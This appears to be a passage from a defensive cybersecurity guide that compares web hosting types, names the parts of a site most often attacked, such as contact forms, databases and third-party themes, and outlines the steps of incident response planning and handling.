Domestic legislation does not apply to foreign hosting companies, so legal and administrative procedures related to the hosted content can be complicated and uncertain.

In terms of technical aspects of hosting, there are four types:

Shared hosting is hosting based on the principle of sharing resources. Different sites on a shared server share the processor, bandwidth, disk space, and so on. This means that if one of the sites on shared hosting has an increased number of access requests, the performance of other sites on the same server will be affected;
Virtual Private Server (VPS) is hosting where everyone has their own resources. Technically, multiple virtual servers are set up on one physical server and each of them has certain resources that it does not share with others. Also, if one of the virtual servers is attacked, the integrity of others is not compromised;
Dedicated server is a type of hosting where the user is assigned the exclusive right to access the machine and use it for any purpose. On the dedicated server, virtual machines can be set up and used for different purposes, such as web hosting, email, data storage;
Cloud hosting is hosting on multiple servers connected to function as one, i.e. using cloud infrastructure, which contributes to the decentralisation of the system, and thus has better integrity. In case of a failure on one of the servers, the others take over its role, so the problem will not affect the operation of the site.

Shared hosting is not recommended in cases when the site consists of active content that changes relatively often and when the number of visitors varies. Dedicated hosting and cloud hosting are better solutions, but their price is a bit higher. Finally, the choice of option depends on the needs of the organisation.

Technical support is one of the most important segments of the hosting service, because in case something goes wrong, this service is a contact point that must be fully cooperative to solve the problem as soon as possible. It is advisable to choose a company whose technical support service is operational 24/7.

Although all the content and traffic on the internet is practically virtual, good old machines are still the basis of it all. That is why it is important to check what kind of hardware the hosting company is using.

Finally, the technical specifications of the hosting package are the most important feature and it is desirable that they are scalable, i.e. that they can be adapted and upgraded in accordance with the changing needs of the organisation.

Good hosting also implies decentralisation. It is not recommended that the same server used for hosting the site is also mail or data server. The web server must be accessible from the public internet, while access to the data centre from the public internet would be a serious security issue. If there is a need to access the data stored in the data centre remotely, it is best to use VPN services.

Critical points

Each platform has several points that are the most common targets of attack. If the web developer pays attention to these zones when creating the site, it will significantly reduce the risks to the content and provide unhindered access to the site:

Contact forms, surveys and other segments of the site where readers can enter some parameters are certainly the places of highest risk because they allow direct access to the system. If they are not necessary for the operation of the site, it is wise to give up the contact form, while surveys can be limited to one entry per IP address. An interactive relationship with readers can be developed in a separate space that is not directly related to the site itself;
The database is also one of the riskier parts of the site. By sending illogical and complex queries to the database, it can be blocked if there is a vulnerability, which prevents readers from accessing the site. The solution is to strictly validate each entry in the database and prevent illegitimate queries via URL or otherwise;
Third-party software that is installed on a platform to make it more interesting can often be an additional risk. This software usually comes in the form of various themes or with objects that improve the functionality and appearance of the site, but it can also contain code or a security flaw that compromises the integrity of the site. Therefore, it is important to always use software made by credible sources, i.e. software for which there is a sufficient number of positive reviews online.

General steps

7 general steps that can be implemented in the case of a cyber security incident:

1. Establishing an IR team: Your incident response plan starts with putting together a group of experts. The team should include these positions:

- Technical Lead: responsible for technical analysis and resolution of incidents.

- Legal and Compliance Lead: responsible for ensuring that incident response activities comply with legal and regulatory requirements.

- Communications Lead: responsible for communication with internal and external stakeholders.

It is also recommended to call external IT support.

2. Conduct threat analysis: Your IR team should look for various clues (for example unusual traffic or requests) in order to analyse potential threats. This means understanding what kinds of attacks your organisation might face and how they could harm you.

3. Outline quick response guidance: In the heat of the moment, your team needs a playbook to follow. This guidance tells them what to do as soon as they spot trouble. It's like having an emergency checklist, so everyone knows exactly what steps to take.

4. Develop procedures for external communication: When an incident happens, you might need to talk to the police, customers, or other organisations. You need clear procedures for who talks to whom and what to say. Think of this step as setting up a secure channel for communication to get help and share information.

5. Train employees: Your employees need to be educated on security practices. They should know how to spot suspicious activity and understand their role in the incident response plan.

6. Test IR plan: Your IR plan should be tested regularly through drills and simulations. This helps your team refine their skills and identify any weaknesses in your plan.

7. Learn: After each incident or test, take time to learn from the experience. What worked well? What could be improved? Continuous improvement is the key to staying ahead of cyber threats.

So, adequately responding to an incident involves assembling a capable team, understanding potential threats, preparing for quick action, and constantly sharpening your skills to keep your organisation safe from digital threats.

Incident response process

Responding effectively to cyber incidents contains these six steps:

1. Preparation: This is where you get ready for any potential incident. You identify what resources you have, like people, tools, and knowledge. It's like putting together a team of superheroes and giving them the equipment they need to protect your organisation.

2. Identification: In this step, you're like a detective trying to spot signs of trouble. You keep an eye out for anything unusual or suspicious. It's a bit like noticing smoke before a fire starts, so you can act quickly.

3. Containment: When you've identified a problem, you need to stop it from getting worse. Imagine a leak in a boat - containment is like plugging that hole to keep water from pouring in.

4. Eradication: After containment, you dig deeper to find the root cause of the problem and eliminate it. It's like getting rid of the pesky weeds in your garden so they don't grow back.

5. Recovery: Once the threat is gone, you start fixing things and getting back to normal. It's like repairing any damage done and getting the boat back in working order so you can sail smoothly.

6. Lessons Learned: Finally, you take a moment to reflect on what happened. What can you do better next time? It's like learning from your mistakes, so you're even better prepared for the future.

So, these six steps are like a roadmap for handling incidents. They help you prepare, respond, and recover from unexpected events, making sure your organisation stays safe.